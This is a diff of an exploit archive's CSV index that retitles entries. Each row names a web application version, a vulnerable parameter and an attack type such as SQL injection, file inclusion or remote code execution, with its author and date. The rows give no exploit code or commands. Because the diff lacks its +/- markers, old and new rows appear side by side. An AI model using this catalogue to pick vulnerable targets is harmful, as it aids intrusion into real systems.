1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0
1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0
1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0
1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0
1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0
@ -16295,7 +16305,7 @@ id,file,description,date,author,platform,type,port
2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0
2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2022,platforms/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0
2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0
@ -16434,7 +16444,7 @@ id,file,description,date,author,platform,type,port
2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0
2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0
2225,platforms/php/webapps/2225.txt,"Mambo Component com_babackup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0
2225,platforms/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0
2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0
2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0
2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0
@ -17071,7 +17081,7 @@ id,file,description,date,author,platform,type,port
3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0
3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0
3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0
3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0
3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection",2007-01-03,ajann,asp,webapps,0
3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0
3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0
3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0
@ -17354,7 +17364,7 @@ id,file,description,date,author,platform,type,port
3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0
3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0
3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0
3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0
3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0
3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0
@ -17445,7 +17455,7 @@ id,file,description,date,author,platform,type,port
3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0
3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0
3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0
3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0
3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0
3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0
3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0
3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0
@ -17469,7 +17479,7 @@ id,file,description,date,author,platform,type,port
3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0
3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0
3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0
3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0
3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0
3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0
@ -17775,7 +17785,7 @@ id,file,description,date,author,platform,type,port
4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0
4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0
4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0
4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0
4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection",2007-08-06,meoconx,cgi,webapps,0
4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0
4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0
4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0
@ -18051,7 +18061,7 @@ id,file,description,date,author,platform,type,port
4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0
4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0
4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0
4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0
4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection",2007-12-05,K-159,php,webapps,0
4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0
4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0
4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0
@ -18091,7 +18101,7 @@ id,file,description,date,author,platform,type,port
4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0
4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0
4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0
4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0
4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0
4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0
4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0
@ -18372,7 +18382,7 @@ id,file,description,date,author,platform,type,port
5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0
5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0
5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0
5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0
5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection",2008-02-18,"it's my",php,webapps,0
5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0
5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
@ -18465,7 +18475,7 @@ id,file,description,date,author,platform,type,port
5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0
5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0
5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0
5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0
5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0
5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0
5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0
@ -18875,35 +18885,35 @@ id,file,description,date,author,platform,type,port
5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0
5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0
5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0
5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0
5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0
5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Parameter Blind SQL Injection",2008-06-11,anonymous,php,webapps,0
5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps,0
5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0
5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0
5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0
5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0
5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0
5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps,0
5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0
5799,platforms/php/webapps/5799.pl,"Mambo Component 'com_galleries' 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0
5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0
5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0
5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0
5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0
5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0
5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion",2008-06-13,Loader007,php,webapps,0
5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' Parameter SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' Parameter SQL Injection",2008-06-13,K-159,php,webapps,0
5804,platforms/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0
5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'sort' Parameter Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0
5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0
5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL Injection",2008-06-14,JosS,php,webapps,0
5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0
5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0
5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0
5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0
5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0
5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0
5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0
5812,platforms/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' Parameter SQL Injection",2008-06-14,anonymous,php,webapps,0
5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0
5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Parameter Blind SQL Injection",2008-06-14,anonymous,php,webapps,0
5816,platforms/php/webapps/5816.pl,"DIY - 'did' Parameter Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0
5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0
5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0
5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (POST) SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0
5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,php,webapps,0
5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0
5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0
5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0
5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0
5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0
5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0
5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0
@ -18950,7 +18960,7 @@ id,file,description,date,author,platform,type,port
5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0
5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0
5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Parameter Local File Inclusion",2008-06-20,storm,php,webapps,0
5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0
5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0
5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0
@ -19008,7 +19018,7 @@ id,file,description,date,author,platform,type,port
5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0
5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0
5935,platforms/php/webapps/5935.pl,"Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0
5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0
5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0
@ -19047,7 +19057,7 @@ id,file,description,date,author,platform,type,port
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
@ -19316,7 +19326,7 @@ id,file,description,date,author,platform,type,port
6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0
6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0
6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0
6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0
6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0
6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0
@ -19813,7 +19823,7 @@ id,file,description,date,author,platform,type,port
7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0
7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0
7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps,0
7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
7009,platforms/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps,0
@ -19824,7 +19834,7 @@ id,file,description,date,author,platform,type,port
7014,platforms/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
7015,platforms/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - (Authentication Bypass) SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
7016,platforms/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps,0
7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-06,G4N0K,php,webapps,0
7017,platforms/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps,0
7018,platforms/php/webapps/7018.txt,"NICE FAQ Script - (Authentication Bypass) SQL Injection",2008-11-06,r45c4l,php,webapps,0
7019,platforms/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps,0
7020,platforms/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps,0
@ -19864,7 +19874,7 @@ id,file,description,date,author,platform,type,port
7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0
7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0
7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0
7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0
